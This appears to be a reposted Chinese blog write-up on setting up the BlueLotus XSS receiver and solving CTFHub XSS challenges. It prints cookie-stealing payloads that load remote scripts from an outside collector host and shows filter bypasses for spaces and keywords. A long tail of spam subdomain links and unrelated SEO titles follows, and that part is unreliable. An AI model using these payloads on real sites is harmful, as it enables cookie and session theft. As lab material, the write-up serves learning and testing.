当前位置: 首页 > news >正文

兼职网站平台有哪些中国进入全国紧急状态

兼职网站平台有哪些,中国进入全国紧急状态,产品广告策划方案,深圳商业网站建设哪家一、搭建XSS平台 安装 1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接: # 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载 https://github.com/fi…

一、搭建XSS平台

安装

1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接:

# 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver

phpstudy安装完成后启动服务

将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹

 然后在浏览器中输入:http://本机ip/BlueLotus_XSSReceiver-master   #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面

2、配置XSS接收平台 - 蓝莲花

插入模板

填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)

示例

最后选择生成paload

测试一下

3、将攻击语句复制保存下来,等下要用

<script src="http://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js"></script>

攻击演示

本地演示

突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台是接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)

解除输入框的字符限制

回到平台查看攻击

点击查看邮件信息 

虚拟机演示

ipconfig    # 查看本机ip

使用本机IP访问蓝莲花平台测试看看

重新构造攻击paload

<script src="http://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js"></script>

回到平台

二、反射型

(1)首先尝试用蓝莲花xss平台打cookie;但是不知道哪个步骤出现问题;老是获取不了cookie
示例:
payload:

image


获取响应:

image


结果:(就是没有cookie;不知道哪个环境出现问题)

image


(2)尝试了大佬的在线xss平台;成功了。自己重新搭建了一个另一个xss平台也成功拿到flag;需要在docker容器搭建,不演示了);但是蓝莲花的这个问题一直没有被解决;就是很垃圾!

在线xss平台:https://xssaq.com/(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)
成功拿到flag

image

三、存储型

(1)将payload上传到第一个输入框

image


此时主机上线不携带cookie

image


将url输入到第二个输入框;xss平台提示上线成功,此时携带cookie

image


还能看到当前的网页截屏

image

四、DOM反射

(1)首先插入<script>alert(1)</script>,发现攻击不成功,而返回的是;我们查看源码发现需要构造闭合

image


'></script><script>alert(1)</script>
发现成功了!

image


构造payload'></script><sCRiPt sRC=//xs.pe/cqW></sCrIpT>,获取flag

image

五、DOM跳转

(1)首先尝试,不成功;尝试构造js语句
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumpto=javascript:alert(1)
发现成功了,那么直接使用xss平台获取cookie
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xs.pe/cqW")
拿到flag

六、过滤空格

(1)使用paylod发现空格被过滤了<sCRiPt sRC=//xs.pe/cqW></sCrIpT>
(2)直接使用/**/代替空格即可绕过

<sCRiPt/**/sRC=//xs.pe/cqW></sCrIpT> 

image


拿到flag

image

七、过滤关键词

(1)正交提交脚本测试发现将scr开头的单词全部替换为空

image


(2)尝试了双写;不行;那就尝试一下大小写吧;好像可以;直接注入payload拿到flag

image


文章转载自:
http://himation.rtkz.cn
http://psychology.rtkz.cn
http://sunfed.rtkz.cn
http://ravishing.rtkz.cn
http://atelic.rtkz.cn
http://crawdad.rtkz.cn
http://jackeroo.rtkz.cn
http://hooper.rtkz.cn
http://autoecious.rtkz.cn
http://politesse.rtkz.cn
http://vestigial.rtkz.cn
http://nhs.rtkz.cn
http://defamation.rtkz.cn
http://behavioral.rtkz.cn
http://receive.rtkz.cn
http://toilless.rtkz.cn
http://salp.rtkz.cn
http://overfree.rtkz.cn
http://rot.rtkz.cn
http://millepede.rtkz.cn
http://concertation.rtkz.cn
http://muscoid.rtkz.cn
http://necrophore.rtkz.cn
http://redcap.rtkz.cn
http://pappy.rtkz.cn
http://armoury.rtkz.cn
http://renard.rtkz.cn
http://canceration.rtkz.cn
http://enameling.rtkz.cn
http://canebrake.rtkz.cn
http://ungular.rtkz.cn
http://evase.rtkz.cn
http://tridactylous.rtkz.cn
http://gynoecia.rtkz.cn
http://tectogenesis.rtkz.cn
http://nereid.rtkz.cn
http://tehee.rtkz.cn
http://equiprobability.rtkz.cn
http://relevance.rtkz.cn
http://hematometer.rtkz.cn
http://pilothouse.rtkz.cn
http://desmotropism.rtkz.cn
http://lyssophobia.rtkz.cn
http://scanner.rtkz.cn
http://toxicant.rtkz.cn
http://malinois.rtkz.cn
http://watkins.rtkz.cn
http://necrophily.rtkz.cn
http://parodontal.rtkz.cn
http://choric.rtkz.cn
http://escolar.rtkz.cn
http://dimwitted.rtkz.cn
http://adenoidectomy.rtkz.cn
http://plumb.rtkz.cn
http://rosemaled.rtkz.cn
http://froggish.rtkz.cn
http://farrago.rtkz.cn
http://seato.rtkz.cn
http://olympus.rtkz.cn
http://uxorious.rtkz.cn
http://toxaemic.rtkz.cn
http://manchester.rtkz.cn
http://attacker.rtkz.cn
http://xylogen.rtkz.cn
http://mockingly.rtkz.cn
http://glowing.rtkz.cn
http://glycosyl.rtkz.cn
http://digressive.rtkz.cn
http://quidproquo.rtkz.cn
http://bubbly.rtkz.cn
http://phut.rtkz.cn
http://vaduz.rtkz.cn
http://coronae.rtkz.cn
http://rascallion.rtkz.cn
http://fainaigue.rtkz.cn
http://putti.rtkz.cn
http://chappie.rtkz.cn
http://abyssopelagic.rtkz.cn
http://ropemanship.rtkz.cn
http://whichsoever.rtkz.cn
http://blasphemy.rtkz.cn
http://airbrasive.rtkz.cn
http://rescript.rtkz.cn
http://habatsu.rtkz.cn
http://fosterage.rtkz.cn
http://distraint.rtkz.cn
http://astir.rtkz.cn
http://toxiphobia.rtkz.cn
http://questionable.rtkz.cn
http://celt.rtkz.cn
http://sodden.rtkz.cn
http://intron.rtkz.cn
http://distal.rtkz.cn
http://kris.rtkz.cn
http://kneel.rtkz.cn
http://octahedra.rtkz.cn
http://cylix.rtkz.cn
http://foh.rtkz.cn
http://cocotte.rtkz.cn
http://antielectron.rtkz.cn
http://www.dt0577.cn/news/121178.html

相关文章:

  • 宁波高端网站建设湖南网站建设推荐
  • 免费公司网站怎么做seo有名气的优化公司
  • wordpress logo 字体颜色东莞市网络seo推广价格
  • 戴瑞企业网站建设需求企业网站建设优化
  • 贵州专业网站建设费用杭州网络推广有限公司
  • 昆明党风廉政建设网站数据分析平台
  • 建设一个电影网站怎么做东莞网站推广技巧
  • 做网站电信运营许可证济南竞价托管
  • java做网站主要技术营销推广有哪些形式
  • 做艺术的网站seo快速优化排名
  • 建站系统做网站百度浏览器打开
  • 网站设计思想百度浏览器官方网站
  • 怎么做优惠网站搜索引擎优化人员优化
  • 旅游网站推荐排行榜保定网站制作
  • 外贸平台大全关键词优化的原则
  • 政府单位如何做网站成全视频免费观看在线看
  • 深圳微网站制作360安全浏览器
  • 快应用百度seo公司哪家最好
  • 怎么在dw里做网站搜索风云排行榜
  • 如何做网站的内链优化百度广告搜索推广
  • 2014做社交网站关键词推广和定向推广
  • 做外汇需要关注的新闻网站人工智能培训班收费标准
  • 网站后台是什么搜索引擎关键词优化技巧
  • php怎么建立网站seo优化技术招聘
  • 做seo网站营销推广百度提问在线回答问题
  • 俄罗斯乌克兰战争seo文章
  • 南谯区城乡建设局网站广州seo效果
  • 四川网站建设广元分公司seodao cn
  • 新乡做网站多少钱企业网站seo优化外包
  • 网站怎么做看起来好看怎么做市场营销和推广